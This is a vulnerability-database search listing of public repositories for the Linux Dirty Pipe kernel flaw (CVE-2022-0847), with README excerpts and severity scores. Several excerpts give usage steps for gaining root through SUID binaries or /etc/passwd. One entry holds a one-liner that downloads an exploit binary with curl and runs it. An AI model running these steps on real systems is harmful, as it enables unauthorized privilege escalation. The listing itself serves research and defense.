Lucene search
+L

297 matches found

Kitploit
Kitploit
added 2026/08/25 6:53 p.m.1 views

CVE-2022-0847

CVE-2022-0847 CVE-2022-0847...

7.8CVSS7AI score0.89721EPSS
SaveExploits101
Kitploit
Kitploit
added 2026/08/25 6:03 p.m.1 views

CVE-2022-0847-dirty-pipe-checker

CVE-2022-0847-dirty-pipe-checker Bash script to check for CVE-2022-0847 Dirty Pipe Abstract This is the story of CVE-2022-0847, a vulnerability in the Linux kernel since 5.8 which allows overwriting data in arbitrary read-only files. This leads to privilege escalation because unprivileged process...

7.8CVSS5.8AI score0.89721EPSS
SaveExploits182
Kitploit
Kitploit
added 2026/08/25 5:19 p.m.1 views

Dirty-Pipe-Exploit

Dirty-Pipe-Exploit The Dirty Pipe exploit CVE-2022-0847 is a Linux kernel vulnerability v5.8+ allowing unprivileged attackers to overwrite arbitrary files via a flaw in the pipe mechanism. This leads to privilege escalation, granting root access. Similar to Dirty Cow but easier to exploit. Fix:...

7.8CVSS5.8AI score0.89721EPSS
SaveExploits101
Kitploit
Kitploit
added 2026/08/25 4:11 p.m.2 views

DirtyPIPE-CVE-2022-0847

CVE-2022-0847 POC Source: https://www.exploit-db.com/exploits/50808 1. Compile In Linux, compile the POC with gcc -o dirty dirty.c 2. Usage Execute the program with ./dirty SUID, where SUID refers to the path of a program with the SUID bit set. Commonly, you can use /usr/bin/passwd, i.e., run...

7.8CVSS7AI score0.89721EPSS
SaveExploits101
Kitploit
Kitploit
added 2026/08/25 3:20 p.m.1 views

dirtypipez-exploit

CVE-2022-0847 DirtyPipe Exploit. Credit: Max Kellermann [email protected] A new Linux vulnerability known as 'Dirty Pipe' allows local users to gain root privileges through publicly available exploits. Today, security researcher Max Kellermann responsibly disclosed the 'Dirty Pipe'...

7.8CVSS7AI score0.89721EPSS
SaveExploits101
Kitploit
Kitploit
added 2026/08/25 2:38 p.m.1 views

CVE-2022-0847-DirtyPipe-Exploits

CVE-2022-0847-DirtyPipe-Exploits A collection of exploits and documentation for penetration testers and red teamers that can be used to aid the exploitation of the Linux Dirty Pipe vulnerability. About The Vulnerability Dirty Pipe CVE-2022-0847 is a local privilege escalation vulnerability in the...

7.8CVSS7.2AI score0.89721EPSS
SaveExploits101References2
Kitploit
Kitploit
added 2026/08/25 1:30 p.m.1 views

CVE-2022-0847_DirtyPipeExploit

What is this This is Max Kellermann's proof of concept for Dirty Pipe, but modified to overwrite root's password field in /etc/passwd and restore after popping a root shell. Side Note: I do not claim any credit for finding this vulnerability or writing the proof of concept. This exploit is merely...

7.8CVSS7.1AI score0.89721EPSS
SaveExploits101
Kitploit
Kitploit
added 2026/08/25 12:56 p.m.2 views

CVE-2022-0847-dirty-pipe-exploit

CVE-2022-0847-dirty-pipe-exploit An exploit for CVE-2022-0847 dirty-pipe vulnerability How to use this Compile with gcc exploit.c -o exploit assumes gcc is installed Run ./exploit and it'll pop a root shell If you are getting error message like then, Login as root with password cspshivam Then,...

7.8CVSS7AI score0.89721EPSS
SaveExploits101
Kitploit
Kitploit
added 2026/08/25 12:55 p.m.1 views

Dirty-Pipe

Oneline Exploit CVE-2022-0847 root@kitploit: curl,-s,-k,https://raw.githubusercontent.com/carlosevieira/Dirty-Pipe/main/exploit-static,-o,/tmp/exploit-dirty-pipe;chmod,+x,/tmp/exploit-dirty-pipe;/tmp/exploit-dirty-pipe...

7.8CVSS7AI score0.89721EPSS
SaveExploits101
Kitploit
Kitploit
added 2026/08/25 12:54 p.m.1 views

dirty-pipe-poc

Dirty Pipe POC CVE-2022-0847 POC - https://dirtypipe.cm4all.com/ Description This exploit attempts to use the CVE-2022-0847 vulnerability to overwrite a read only file. When make exploit is run, it will: 1. Create a readonlyfile.txt 2. Execute the dirtypipe exploit. 3. Check if the dirtypipe...

7.8CVSS7AI score0.89721EPSS
SaveExploits101
Kitploit
Kitploit
added 2026/08/25 12:03 p.m.1 views

Dirty-Pipe

Dirty Pipe Exploit CVE-2022-0847 Overview This repository contains a Proof of Concept PoC exploit for the Dirty Pipe vulnerability CVE-2022-0847 , which affects Linux kernel versions 5.8 to 5.16. This vulnerability allows local privilege escalation by exploiting improper handling of pipe buffers ...

7.8CVSS7.7AI score0.89721EPSS
SaveExploits101
Kitploit
Kitploit
added 2026/08/25 10:45 a.m.1 views

ps-lab-cve-2022-0847

ps-lab-cve-2022-0847 Resources required for building Pluralsight CVE-2022-0847 lab...

7.8CVSS5.3AI score0.89721EPSS
SaveExploits101
Kitploit
Kitploit
added 2026/08/25 10:08 a.m.1 views

CVE-2022-0847

This repository does not have a README...

7.8CVSS5.4AI score0.89721EPSS
SaveExploits101
Kitploit
Kitploit
added 2026/08/25 9:23 a.m.1 views

CVE-2022-0847-DirtyPipe-Exploits

This repository does not have a README...

7.8CVSS5.4AI score0.89721EPSS
SaveExploits101
Kitploit
Kitploit
added 2026/08/25 8:34 a.m.1 views

COMP3320-VAPT

COMP3320-VAPT Files required to demonstrate CVE-2022-0847 vulnerability in Linux Kernel v5.8 Compilation $ make...

7.8CVSS5.4AI score0.89721EPSS
SaveExploits101
Kitploit
Kitploit
added 2026/08/25 7:41 a.m.1 views

CVE-2022-0847-eBPF

CVE-2022-0847-eBPF An eBPF program to detect and defense attacks on CVE-2022-0847. In the kernel space, the program detects splice system calls, if such a system call contains a pipe as the output fd, and the flags of the pipe buffer is set to PIPEBUFFLAGCANMERGE , then an event would be submitte...

7.8CVSS7.1AI score0.89721EPSS
SaveExploits101
Kitploit
Kitploit
added 2026/08/25 5:07 a.m.1 views

DirtyPipePython

dirty.py Description This is an exploit for the Linux kernel vulnerability CVE-2022-0847 DirtyPipe discovered by Max Kellerman. This code combines two existing DirtyPipe POC's into one: febinrev Overwrites sudo binary to directly pop a root shell eremus-dev A direct copy of Kellerman's POC into...

7.8CVSS7AI score0.89721EPSS
SaveExploits101References2
Kitploit
Kitploit
added 2026/08/25 4:23 a.m.1 views

dirtypipe

DISCLAIMER This code is for educational and research purposes only. Do not use it on systems you do not own or have permission to test. The author is not responsible for any misuse, damage, or legal consequences resulting from the use of this code. DirtyPipe CVE-2022-0847 View the writeup for thi...

7.8CVSS5.9AI score0.89721EPSS
SaveExploits101References1
Kitploit
Kitploit
added 2026/08/25 4:23 a.m.1 views

CVE-2022-0847-DirtyPipe-Exploits

CVE-2022-0847-DirtyPipe-Exploits This repository offers a comprehensive collection of exploits and documentation specifically designed for penetration testers and red team professionals. It serves as a valuable resource for those aiming to exploit the Linux Dirty Pipe vulnerability effectively...

7.8CVSS6.3AI score0.89721EPSS
SaveExploits101References1
Kitploit
Kitploit
added 2026/08/25 4:22 a.m.1 views

CVE-2022-0847-DirtyPipe-Container-Breakout

DirtyPipe Container Breakout PoC This repo contains a PoC for the dirtypipe kernel vulnerability, for breaking out of a container. Further explanation can be found in this blog post...

7.8CVSS6.5AI score0.89721EPSS
SaveExploits101
Rows per page
Query Builder